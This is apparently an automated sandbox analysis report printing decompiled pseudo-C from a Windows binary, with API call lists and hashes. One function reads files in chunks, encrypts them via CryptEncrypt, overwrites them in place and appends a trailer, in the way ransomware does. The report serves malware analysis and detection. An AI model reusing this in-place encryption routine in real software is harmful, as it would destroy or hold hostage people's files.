                          				_push(_t75);
                          				_push(_t71);
                          				_push(_t31);
                          				 *[fs:0x0] =  &_v20;
                          				_v28 = _t82;
                          				_t58 = _a4;
                          				if(_t58 != 0) {
                          					_t61 = _t58;
                          					_t10 =  &(_t61[1]); // 0x1302fda
                          					_t69 = _t10;
                          					do {
                          						_t33 =  *_t61;
                          						_t61 =  &(_t61[1]);
                          					} while (_t33 != 0);
                          					_t62 = _t61 - _t69;
                          					_t11 = _t62 + 1; // 0x1302fdb
                          					_t34 = _t11;
                          					_v44 = _t34;
                          					if(_t34 > 0x7fffffff) {
                          						L17:
                          						E0132FAD0(0x80070057);
                          						goto L18;
                          					} else {
                          						_t71 = MultiByteToWideChar(0, 0, _t58, _t34, 0, 0);
                          						_v40 = _t71;
                          						if(_t71 == 0) {
                          							L18:
                          							_t36 = GetLastError();
                          							if(_t36 > 0) {
                          								_t36 = _t36 & 0x0000ffff | 0x80070000;
                          							}
                          							E0132FAD0(_t36);
                          							goto L21;
                          						} else {
                          							_v8 = 0;
                          							_t49 = _t71 + _t71;
                          							if(_t71 >= 0x1000) {
                          								_push(_t49);
                          								_t50 = E0134AA4A();
                          								_t82 =  &(_t82[2]);
                          								_t75 = _t50;
                          								_v36 = _t75;
                          								_v8 = 0xfffffffe;
                          							} else {
                          								E0132F420();
                          								_v28 = _t82;
                          								_t75 = _t82;
                          								_v36 = _t75;
                          								_v8 = 0xfffffffe;
                          							}
                          							if(_t75 == 0) {
                          								L16:
                          								E0132FAD0(0x8007000e);
                          								goto L17;
                          							} else {
                          								_t52 = MultiByteToWideChar(0, 0, _t58, _v44, _t75, _t71);
                          								if(_t52 == 0) {
                          									L21:
                          									if(_t71 >= 0x1000) {
                          										E01349EA4(_t75);
                          										_t82 =  &(_t82[2]);
                          									}
                          									_t38 = GetLastError();
                          									if(_t38 > 0) {
                          										_t38 = _t38 & 0x0000ffff | 0x80070000;
                          									}
                          									E0132FAD0(_t38);
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									asm("int3");
                          									_push(_t79);
                          									_t70 = _v56;
                          									_push(_t71);
                          									_t72 = _t62;
                          									 *_t72 = 0x1378f18;
                          									 *((intOrPtr*)(_t72 + 4)) =  *((intOrPtr*)(_t70 + 4));
                          									_t63 =  *((intOrPtr*)(_t70 + 8));
                          									 *((intOrPtr*)(_t72 + 8)) = _t63;
                          									 *(_t72 + 0xc) = 0;
                          									if(_t63 != 0) {
                          										 *0x1374358(_t63, _t75);
                          										 *((intOrPtr*)( *((intOrPtr*)( *_t63 + 4))))();
                          									}
                          									return _t72;
                          								} else {
                          									__imp__#2(_t75);
                          									_t59 = _t52;
                          									if(_t71 >= 0x1000) {
                          										E01349EA4(_t75);
                          										_t82 =  &(_t82[2]);
                          									}
                          									if(_t59 == 0) {
                          										goto L16;
                          									} else {
                          										goto L2;
                          									}
                          								}
                          							}
                          						}
                          					}
                          				} else {
                          					L2:
                          					 *[fs:0x0] = _v20;
                          					_pop(_t78);
                          					return E0132EA79(_v32 ^ _t79, _t78);
                          				}
                          			}

                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,01302FD9,01302FDB,00000000,00000000,39CCA9F6,00000000,00000000,?,Function_00055BB0,013A0408,000000FE,?,01302FD9,013836C2), ref: 0132FB79
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,01302FD9,?,00000000,00000000,?,Function_00055BB0,013A0408,000000FE,?,01302FD9), ref: 0132FBF4
                          • SysAllocString.OLEAUT32(00000000), ref: 0132FBFF
                          • _com_issue_error.COMSUPP ref: 0132FC28
                          • _com_issue_error.COMSUPP ref: 0132FC32
                          • GetLastError.KERNEL32(80070057,39CCA9F6,00000000,00000000,?,Function_00055BB0,013A0408,000000FE,?,01302FD9,013836C2), ref: 0132FC37
                          • _com_issue_error.COMSUPP ref: 0132FC4A
                          • GetLastError.KERNEL32(00000000,?,Function_00055BB0,013A0408,000000FE,?,01302FD9,013836C2), ref: 0132FC60
                          • _com_issue_error.COMSUPP ref: 0132FC73
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                          • String ID:
                          • API String ID: 1353541977-0
                          • Opcode ID: 9c64b7311d92b05d97024a282e8da38911c546a94ffbdf40ef084c1111a33903
                          • Instruction ID: ac377e06843f2ddc38fb636244f35aa2c196973e2028f9ba039c63dfcf71d83b
                          • Opcode Fuzzy Hash: 9c64b7311d92b05d97024a282e8da38911c546a94ffbdf40ef084c1111a33903
                          • Instruction Fuzzy Hash: BC41F971A002259BDB24EF6CD845BAEBBFCEF48718F104229F905E7240D734A9008BE4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 61%
                          			E013171A2(void* __ebx, void* __edx, void* __edi, signed int* _a4, signed int _a8) {
                          				signed int _v8;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				char _v24;
                          				signed int _v28;
                          				void* __esi;
                          				signed int _t49;
                          				signed int _t53;
                          				long _t54;
                          				signed int _t55;
                          				signed int _t61;
                          				signed int _t64;
                          				signed int _t65;
                          				void* _t68;
                          				signed int _t74;
                          				long _t78;
                          				signed int* _t88;
                          				void* _t89;
                          				signed int _t90;
                          				intOrPtr _t97;
                          				signed int* _t101;
                          				void* _t106;
                          				signed int _t112;
                          
                          				_t106 = __edx;
                          				_t49 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t49 ^ _t112;
                          				_t88 = _a4;
                          				_t108 = _a8;
                          				_v28 = _t108;
                          				if(( *_t88 & 0xfffffeff) != 1) {
                          					__eflags = _t108;
                          					if(_t108 != 0) {
                          						__eflags =  *(_t108 + 4);
                          						_t53 =  *_t108;
                          						if(__eflags < 0) {
                          							L29:
                          							_t54 = GetCurrentThreadId();
                          							__eflags = _t88[0xa] - _t54;
                          							if(_t88[0xa] == _t54) {
                          								goto L8;
                          							} else {
                          								 *0x1374358();
                          								_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t88[1] + 4))))();
                          								_t108 = _v28;
                          								__eflags = _t64;
                          								if(_t64 == 0) {
                          									goto L11;
                          								} else {
                          									goto L8;
                          								}
                          							}
                          						} else {
                          							if(__eflags > 0) {
                          								L17:
                          								_t65 = _t53 |  *(_t108 + 4);
                          								__eflags = _t65;
                          								if(_t65 != 0) {
                          									L19:
                          									E0131BE10(_t89, _t106,  &_v24, 1);
                          									while(1) {
                          										_t68 =  *_t108;
                          										_t97 = _v20;
                          										__eflags = _t97 -  *(_t108 + 4);
                          										if(__eflags < 0) {
                          											goto L26;
                          										}
                          										if(__eflags > 0) {
                          											L23:
                          											__eflags = _v24 - _t68;
                          											if(_v24 != _t68) {
                          												goto L11;
                          											} else {
                          												__eflags = _t97 -  *(_t108 + 4);
                          												if(_t97 !=  *(_t108 + 4)) {
                          													goto L11;
                          												} else {
                          													__eflags = _v16 -  *((intOrPtr*)(_t108 + 8));
                          													if(_v16 >=  *((intOrPtr*)(_t108 + 8))) {
                          														goto L11;
                          													} else {
                          														goto L26;
                          													}
                          												}
                          											}
                          										} else {
                          											__eflags = _v24 - _t68;
                          											if(_v24 < _t68) {
                          												goto L26;
                          											} else {
                          												goto L23;
                          											}
                          										}
                          										goto L36;
                          										L26:
                          										__eflags = _t88[0xa] - GetCurrentThreadId();
                          										if(__eflags == 0) {
                          											goto L8;
                          										} else {
                          											 *0x1374358(E0131BDA9(__eflags, _v28,  &_v24));
                          											_t101 =  &(_t88[1]);
                          											_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t88[1] + 8))))();
                          											__eflags = _t74;
                          											if(_t74 != 0) {
                          												goto L7;
                          											} else {
                          												E0131BE10(_t101, _t106,  &_v24, 1);
                          												_t108 = _v28;
                          												continue;
                          											}
                          										}
                          										goto L36;
                          									}
                          								} else {
                          									__eflags =  *((intOrPtr*)(_t108 + 8)) - _t65;
                          									if( *((intOrPtr*)(_t108 + 8)) <= _t65) {
                          										goto L29;
                          									} else {
                          										goto L19;
                          									}
                          								}
                          							} else {
                          								__eflags = _t53;
                          								if(_t53 < 0) {
                          									goto L29;
                          								} else {
                          									goto L17;
                          								}
                          							}
                          						}
                          					} else {
                          						_t78 = GetCurrentThreadId();
                          						__eflags = _t88[0xa] - _t78;
                          						if(_t88[0xa] != _t78) {
                          							 *0x1374358();
                          							 *( *(_t88[1]))();
                          							L7:
                          							_t108 = _v28;
                          						}
                          						L8:
                          						_t90 = _t88[0xb];
                          						_t55 = _t90 + 1;
                          						_t88[0xb] = _t55;
                          						__eflags = _t55 - 1;
                          						if(_t55 <= 1) {
                          							_t88[0xa] = GetCurrentThreadId();
                          							goto L35;
                          						} else {
                          							__eflags =  *_t88 & 0x00000100;
                          							if(( *_t88 & 0x00000100) != 0) {
                          								goto L35;
                          							} else {
                          								_t88[0xb] = _t90;
                          								__eflags = _t108;
                          								if(_t108 == 0) {
                          									L32:
                          									_push(3);
                          								} else {
                          									L11:
                          									_t61 =  *_t108 |  *(_t108 + 4);
                          									__eflags = _t61;
                          									if(_t61 != 0) {
                          										L13:
                          										_push(2);
                          									} else {
                          										__eflags =  *((intOrPtr*)(_t108 + 8)) - _t61;
                          										if( *((intOrPtr*)(_t108 + 8)) == _t61) {
                          											goto L32;
                          										} else {
                          											goto L13;
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          				} else {
                          					if(_t88[0xa] != GetCurrentThreadId()) {
                          						_t108 =  *(_t88[1]);
                          						 *0x1374358();
                          						 *( *(_t88[1]))();
                          						_t88[0xa] = GetCurrentThreadId();
                          					}
                          					_t88[0xb] = _t88[0xb] + 1;
                          					L35:
                          				}
                          				L36:
                          				return E0132EA79(_v8 ^ _t112, _t108);
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                          • String ID:
                          • API String ID: 3943753294-0
                          • Opcode ID: 37dc579a31a970bd06d061a0506fa1c80db8d641e2a999c95c68c08e422f5d64
                          • Instruction ID: 515a98bdc622d7dae776233c25a8f2786bf223ec5076f10ebdf4656677f58d65
                          • Opcode Fuzzy Hash: 37dc579a31a970bd06d061a0506fa1c80db8d641e2a999c95c68c08e422f5d64
                          • Instruction Fuzzy Hash: 4C517031900216CFDF29DF68D5859A9BBB9FF08318B294459ED06AB24DD730E982CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 63%
                          			E01309380(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                          				struct _OVERLAPPED* _v8;
                          				char _v16;
                          				signed int _v20;
                          				long _v24;
                          				long _v28;
                          				intOrPtr _v32;
                          				char _v36;
                          				union _LARGE_INTEGER* _v40;
                          				void* _v44;
                          				union _LARGE_INTEGER* _v48;
                          				void* _v52;
                          				intOrPtr _v56;
                          				struct _OVERLAPPED* _v60;
                          				char _v76;
                          				intOrPtr _v80;
                          				long _v84;
                          				char _v100;
                          				intOrPtr _v104;
                          				char _v124;
                          				intOrPtr _v132;
                          				intOrPtr _v136;
                          				long _v140;
                          				intOrPtr _v144;
                          				void _v148;
                          				union _LARGE_INTEGER* _v152;
                          				union _LARGE_INTEGER _v156;
                          				union _LARGE_INTEGER* _v160;
                          				intOrPtr _v164;
                          				intOrPtr _v168;
                          				intOrPtr _v172;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t103;
                          				signed int _t104;
                          				intOrPtr _t106;
                          				char* _t110;
                          				intOrPtr _t120;
                          				intOrPtr _t130;
                          				intOrPtr _t138;
                          				union _LARGE_INTEGER* _t150;
                          				long _t162;
                          				struct _OVERLAPPED* _t163;
                          				intOrPtr _t172;
                          				union _LARGE_INTEGER* _t182;
                          				long _t183;
                          				void* _t185;
                          				void* _t188;
                          				union _LARGE_INTEGER* _t189;
                          				union _LARGE_INTEGER _t190;
                          				void* _t191;
                          				intOrPtr _t193;
                          				signed int _t194;
                          				void* _t195;
                          				void* _t196;
                          				void* _t197;
                          				intOrPtr _t203;
                          				void* _t217;
                          
                          				_push(0xffffffff);
                          				_push(0x1366d55);
                          				_push( *[fs:0x0]);
                          				_t196 = _t195 - 0x9c;
                          				_t103 =  *0x13a4018; // 0x39cca9f6
                          				_t104 = _t103 ^ _t194;
                          				_v20 = _t104;
                          				_push(__ebx);
                          				_push(__edi);
                          				_push(_t104);
                          				 *[fs:0x0] =  &_v16;
                          				_v172 = __ecx;
                          				_t106 = _a4;
                          				_t185 = _a8;
                          				_v168 = _t106;
                          				if(_t106 == 0 || _t185 == 0xffffffff) {
                          					L36:
                          					goto L37;
                          				} else {
                          					_t162 = E01309150(_t106, 0, 0x2000);
                          					if(_t162 < 0x2000) {
                          						goto L36;
                          					}
                          					_t110 =  &_v36;
                          					asm("xorps xmm0, xmm0");
                          					asm("movq [ebp-0x20], xmm0");
                          					__imp__GetFileSizeEx(_t185, _t110);
                          					if(_t110 == 0) {
                          						goto L36;
                          					}
                          					_push(0);
                          					_v28 = 0;
                          					_v24 = 0;
                          					E012F7D00(_t162,  &_v124, __edx, _t162);
                          					_v8 = 0;
                          					_v60 = 0;
                          					_v56 = 0xf;
                          					_v76 = 0;
                          					_t189 = E012F57D0(_t162, __edx, _t185, 0x100010);
                          					_v60 = 0x100000;
                          					_v152 = _t189;
                          					_v56 = 0x10000f;
                          					E013478D0(_t185, _t189, 0, 0x100000);
                          					 *((char*)(_t189 + 0x100000)) = 0;
                          					E012F5760( &_v76,  &_v152);
                          					_t197 = _t196 + 0x18;
                          					_v8 = 1;
                          					asm("xorps xmm0, xmm0");
                          					_t203 = _v32;
                          					asm("movq [ebp-0x28], xmm0");
                          					asm("movlpd [ebp-0xa0], xmm0");
                          					if(_t203 < 0 || _t203 <= 0 && _v36 <= 0) {
                          						L20:
                          						asm("xorps xmm0, xmm0");
                          						asm("movq [ebp-0x98], xmm0");
                          						_t182 = _v152;
                          						_t190 = _v156.LowPart;
                          						asm("movq [ebp-0x98], xmm0");
                          						_push(2);
                          						_v44 = _v156;
                          						_v52 = _t190;
                          						_v48 = _t182;
                          						_v40 = _v152;
                          						if(SetFilePointerEx(_t185, _t190, _t182,  &_v44) == 0) {
                          							goto L30;
                          						}
                          						E01309EE0(_t162, _v172, _t182, _t185,  &_v100, _v168);
                          						_t164 = WriteFile;
                          						_t128 =  >=  ? _v100 :  &_v100;
                          						if(WriteFile(_t185,  >=  ? _v100 :  &_v100, _v84,  &_v24, 0) == 0) {
                          							L28:
                          							_t130 = _v80;
                          							if(_t130 >= 0x10) {
                          								_push(_t130 + 1);
                          								E012F56A0(_t164, _t185, _v100);
                          								_t197 = _t197 + 8;
                          							}
                          							goto L30;
                          						}
                          						_t183 = _v84;
                          						if(_v24 != _t183) {
                          							goto L28;
                          						}
                          						_v148 = _v36;
                          						_v136 = _a12;
                          						_v144 = _v32;
                          						_v140 = _t183;
                          						_v132 = 0x1030307;
                          						if(WriteFile(_t185,  &_v148, 0x18,  &_v24, 0) == 0 || _v24 != 0x18) {
                          							goto L28;
                          						} else {
                          							_t138 = _v80;
                          							if(_t138 >= 0x10) {
                          								_push(_t138 + 1);
                          								E012F56A0(WriteFile, _t185, _v100);
                          								_t197 = _t197 + 8;
                          							}
                          							_t163 = 1;
                          							goto L31;
                          						}
                          					} else {
                          						_v152 = _v160;
                          						_v160 = _v164;
                          						while(1) {
                          							_push(1);
                          							asm("xorps xmm0, xmm0");
                          							asm("movlpd [ebp-0x30], xmm0");
                          							if(SetFilePointerEx(_t185, _v52, _v48,  &_v44) == 0) {
                          								break;
                          							}
                          							_t146 =  >=  ? _v76 :  &_v76;
                          							if(ReadFile(_t185,  >=  ? _v76 :  &_v76, 0x100000,  &_v28, 0) == 0) {
                          								break;
                          							}
                          							_push(0);
                          							if(SetFilePointerEx(_t185, _v44, _v40,  &_v52) == 0) {
                          								break;
                          							}
                          							_t191 = 0;
                          							if(_v28 <= 0) {
                          								L16:
                          								if(_a12 == 1) {
                          									goto L20;
                          								}
                          								_t150 = _v152;
                          								_t193 = _v160 + 0x100000;
                          								_v160 = _t193;
                          								asm("adc eax, 0x0");
                          								_v152 = _t150;
                          								_t217 = _t150 - _v32;
                          								if(_t217 < 0 || _t217 <= 0 && _t193 < _v36) {
                          									continue;
                          								} else {
                          									goto L20;
                          								}
                          							}
                          							while(1) {
                          								_t152 =  >=  ? _v76 :  &_v76;
                          								_t179 =  >=  ? _v124 :  &_v124;
                          								_t153 = ( >=  ? _v76 :  &_v76) + _t191;
                          								E01345ED0( >=  ? _v124 :  &_v124, ( >=  ? _v76 :  &_v76) + _t191, 0x2000);
                          								_t197 = _t197 + 0xc;
                          								if(E0130A0A0(_v168, 0,  &_v124, 0x2000, _t162) == 0) {
                          									goto L30;
                          								}
                          								_t158 =  >=  ? _v124 :  &_v124;
                          								if(WriteFile(_t185,  >=  ? _v124 :  &_v124, _t162,  &_v24, 0) == 0) {
                          									goto L30;
                          								}
                          								_t191 = _t191 + 0x2000;
                          								if(_t191 < _v28) {
                          									continue;
                          								}
                          								goto L16;
                          							}
                          							break;
                          						}
                          						L30:
                          						_t163 = 0;
                          						L31:
                          						_t120 = _v56;
                          						if(_t120 >= 0x10) {
                          							_push(_t120 + 1);
                          							E012F56A0(_t163, _t185, _v76);
                          							_t197 = _t197 + 8;
                          						}
                          						_t172 = _v104;
                          						_v60 = 0;
                          						_v56 = 0xf;
                          						_v76 = 0;
                          						if(_t172 >= 0x10) {
                          							_push(_t172 + 1);
                          							E012F56A0(_t163, _t185, _v124);
                          						}
                          						L37:
                          						 *[fs:0x0] = _v16;
                          						_pop(_t188);
                          						return E0132EA79(_v20 ^ _t194, _t188);
                          					}
                          				}
                          			}


                          APIs
                            • Part of subcall function 01309150: CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0130917A
                          • GetFileSizeEx.KERNEL32(?,?,?,00000000,00002000,39CCA9F6,00000010,00000000), ref: 013093F9
                          • SetFilePointerEx.KERNEL32(?,?,00000000,01366D55,00000001,?,?,?,00000000,00000000), ref: 013094D7
                          • ReadFile.KERNEL32(?,00000000,00100000,00000000,00000000,?,?,?,00000000,00000000), ref: 013094FD
                          • SetFilePointerEx.KERNEL32(?,01366D55,000000FF,?,00000000,?,?,?,00000000,00000000), ref: 01309518
                          • WriteFile.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,00002000,00000000), ref: 0130958A
                          • SetFilePointerEx.KERNEL32(?,?,?,01366D55,00000002,?,?,?,00000000,00000000), ref: 0130961E
                          • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 0130965D
                          • WriteFile.KERNEL32(?,?,00000018,00000000,00000000,?,?,?,00000000,00000000), ref: 013096A3
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: File$PointerWrite$CryptEncryptReadSize
                          • String ID:
                          • API String ID: 3516733335-0
                          • Opcode ID: 25e4167d6129881a0710d34350b71e5a32fe3715b5c8eeea9693648c6ac32293
                          • Instruction ID: 88253086f0ff436e976d5ff6ddcb48be3bbfb9f129776f834a1d991fcb69febc
                          • Opcode Fuzzy Hash: 25e4167d6129881a0710d34350b71e5a32fe3715b5c8eeea9693648c6ac32293
                          • Instruction Fuzzy Hash: E4B13971D1021D9FEB21CFA8CC95BEEBBB9EF09318F540159E518B6282D771A984CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 73%
                          			E01354882(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                          				signed int _v8;
                          				signed int _v12;
                          				short _v270;
                          				short _v272;
                          				char _v528;
                          				char _v700;
                          				signed int _v704;
                          				short _v706;
                          				signed int _v708;
                          				signed int _v712;
                          				signed int _v716;
                          				intOrPtr _v720;
                          				signed int _v724;
                          				intOrPtr _v728;
                          				signed int* _v732;
                          				signed int _v736;
                          				signed int _v740;
                          				signed int _v744;
                          				intOrPtr _v772;
                          				signed int _v784;
                          				void* __ebp;
                          				signed int _t156;
                          				void* _t163;
                          				signed int _t166;
                          				signed int _t167;
                          				intOrPtr _t168;
                          				signed int _t171;
                          				signed int _t173;
                          				signed int _t174;
                          				signed int _t177;
                          				signed int _t178;
                          				signed int _t181;
                          				signed int _t182;
                          				signed int _t184;
                          				signed int _t202;
                          				signed int _t204;
                          				signed int _t206;
                          				signed int _t210;
                          				signed int _t213;
                          				intOrPtr* _t221;
                          				intOrPtr* _t222;
                          				char* _t229;
                          				intOrPtr _t233;
                          				intOrPtr* _t234;
                          				signed int _t236;
                          				signed int _t241;
                          				signed int _t242;
                          				void* _t247;
                          				signed int _t248;
                          				intOrPtr _t250;
                          				void* _t254;
                          				signed int _t256;
                          				signed int _t258;
                          				signed int _t261;
                          				signed int* _t262;
                          				short _t263;
                          				signed int _t265;
                          				signed int _t269;
                          				void* _t271;
                          				void* _t273;
                          
                          				_t265 = _t269;
                          				_t156 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t156 ^ _t265;
                          				_push(__ebx);
                          				_t213 = _a8;
                          				_push(__esi);
                          				_push(__edi);
                          				_t250 = _a4;
                          				_v736 = _t213;
                          				_v732 = E013559E0(__ecx, __edx) + 0x278;
                          				_t163 = E01353F6D(_t213, __edx, _t250, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
                          				_t271 = _t269 - 0x2e4 + 0x18;
                          				if(_t163 == 0) {
                          					L40:
                          					__eflags = 0;
                          					goto L41;
                          				} else {
                          					_t10 = _t213 + 2; // 0x2
                          					_t256 = _t10 << 4;
                          					_t166 =  &_v272;
                          					_v712 = _t256;
                          					_t221 =  *((intOrPtr*)(_t256 + _t250));
                          					while(1) {
                          						_v704 = _v704 & 0x00000000;
                          						_t258 = _v712;
                          						if( *_t166 !=  *_t221) {
                          							break;
                          						}
                          						if( *_t166 == 0) {
                          							L7:
                          							_t167 = _v704;
                          						} else {
                          							_t263 =  *((intOrPtr*)(_t166 + 2));
                          							_v706 = _t263;
                          							_t258 = _v712;
                          							if(_t263 !=  *((intOrPtr*)(_t221 + 2))) {
                          								break;
                          							} else {
                          								_t166 = _t166 + 4;
                          								_t221 = _t221 + 4;
                          								if(_v706 != 0) {
                          									continue;
                          								} else {
                          									goto L7;
                          								}
                          							}
                          						}
                          						L9:
                          						if(_t167 != 0) {
                          							_t222 =  &_v272;
                          							_t247 = _t222 + 2;
                          							do {
                          								_t168 =  *_t222;
                          								_t222 = _t222 + 2;
                          								__eflags = _t168 - _v704;
                          							} while (_t168 != _v704);
                          							_v708 = (_t222 - _t247 >> 1) + 1;
                          							_t171 = E013576ED(4 + ((_t222 - _t247 >> 1) + 1) * 2);
                          							_v724 = _t171;
                          							__eflags = _t171;
                          							if(_t171 == 0) {
                          								goto L40;
                          							} else {
                          								_v720 =  *((intOrPtr*)(_t258 + _t250));
                          								_v740 =  *(_t250 + 0xa0 + _t213 * 4);
                          								_v744 =  *(_t250 + 8);
                          								_t229 =  &_v272;
                          								_v728 = _t171 + 4;
                          								_t173 = E01352808(_t171 + 4, _v708, _t229);
                          								_t273 = _t271 + 0xc;
                          								__eflags = _t173;
                          								if(_t173 != 0) {
                          									_t174 = _v704;
                          									_push(_t174);
                          									_push(_t174);
                          									_push(_t174);
                          									_push(_t174);
                          									_push(_t174);
                          									E013496E7();
                          									asm("int3");
                          									_push(_t265);
                          									_push(_t229);
                          									_v784 = _v784 & 0x00000000;
                          									_t177 = E0135628F(_v772, 0x20001004,  &_v784, 2);
                          									__eflags = _t177;
                          									if(_t177 == 0) {
                          										L50:
                          										_t178 = 0xfde9;
                          									} else {
                          										_t178 = _v12;
                          										__eflags = _t178;
                          										if(_t178 == 0) {
                          											goto L50;
                          										}
                          									}
                          									return _t178;
                          								} else {
                          									__eflags = _v272 - 0x43;
                          									 *((intOrPtr*)(_t258 + _t250)) = _v728;
                          									if(_v272 != 0x43) {
                          										L18:
                          										_t181 = E01353C8A(_t213, _t250,  &_v700);
                          										_t248 = _v704;
                          									} else {
                          										__eflags = _v270;
                          										if(_v270 != 0) {
                          											goto L18;
                          										} else {
                          											_t248 = _v704;
                          											_t181 = _t248;
                          										}
                          									}
                          									 *(_t250 + 0xa0 + _t213 * 4) = _t181;
                          									__eflags = _t213 - 2;
                          									if(_t213 != 2) {
                          										__eflags = _t213 - 1;
                          										if(_t213 != 1) {
                          											__eflags = _t213 - 5;
                          											if(_t213 == 5) {
                          												 *((intOrPtr*)(_t250 + 0x14)) = _v716;
                          											}
                          										} else {
                          											 *((intOrPtr*)(_t250 + 0x10)) = _v716;
                          										}
                          									} else {
                          										_t262 = _v732;
                          										 *(_t250 + 8) = _v716;
                          										_v708 = _t262[8];
                          										_t241 = _t262[9];
                          										_v716 = _t241;
                          										while(1) {
                          											__eflags =  *(_t250 + 8) -  *(_t262 + _t248 * 8);
                          											if( *(_t250 + 8) ==  *(_t262 + _t248 * 8)) {
                          												break;
                          											}
                          											_t210 =  *(_t262 + _t248 * 8);
                          											_t241 =  *(_t262 + 4 + _t248 * 8);
                          											 *(_t262 + _t248 * 8) = _v708;
                          											 *(_t262 + 4 + _t248 * 8) = _v716;
                          											_t248 = _t248 + 1;
                          											_t213 = _v736;
                          											_v708 = _t210;
                          											_v716 = _t241;
                          											__eflags = _t248 - 5;
                          											if(_t248 < 5) {
                          												continue;
                          											} else {
                          											}
                          											L26:
                          											__eflags = _t248 - 5;
                          											if(__eflags == 0) {
                          												_t202 = E0135877D(_t213, _t248, _t250, __eflags, _v704, 1, 0x137c1e8, 0x7f,  &_v528,  *(_t250 + 8), 1);
                          												_t273 = _t273 + 0x1c;
                          												__eflags = _t202;
                          												if(_t202 == 0) {
                          													_t242 = _v704;
                          												} else {
                          													_t204 = _v704;
                          													do {
                          														 *(_t265 + _t204 * 2 - 0x20c) =  *(_t265 + _t204 * 2 - 0x20c) & 0x000001ff;
                          														_t204 = _t204 + 1;
                          														__eflags = _t204 - 0x7f;
                          													} while (_t204 < 0x7f);
                          													_t206 = E013469C4( &_v528,  *0x13a41f0, 0xfe);
                          													_t273 = _t273 + 0xc;
                          													__eflags = _t206;
                          													_t242 = 0 | _t206 == 0x00000000;
                          												}
                          												_t262[1] = _t242;
                          												 *_t262 =  *(_t250 + 8);
                          											}
                          											 *(_t250 + 0x18) = _t262[1];
                          											goto L38;
                          										}
                          										__eflags = _t248;
                          										if(_t248 != 0) {
                          											 *_t262 =  *(_t262 + _t248 * 8);
                          											_t262[1] =  *(_t262 + 4 + _t248 * 8);
                          											 *(_t262 + _t248 * 8) = _v708;
                          											 *(_t262 + 4 + _t248 * 8) = _t241;
                          										}
                          										goto L26;
                          									}
                          									L38:
                          									_t182 = _t213 * 0xc;
                          									_t111 = _t182 + 0x137c270; // 0x132f829
                          									 *0x1374358(_t250);
                          									_t184 =  *((intOrPtr*)( *_t111))();
                          									_t233 = _v720;
                          									__eflags = _t184;
                          									if(_t184 == 0) {
                          										__eflags = _t233 - 0x13a42c8;
                          										if(_t233 != 0x13a42c8) {
                          											_t261 = _t213 + _t213;
                          											__eflags = _t261;
                          											asm("lock xadd [eax], ecx");
                          											if(_t261 != 0) {
                          												goto L45;
                          											} else {
                          												E01355C8F( *((intOrPtr*)(_t250 + 0x28 + _t261 * 8)));
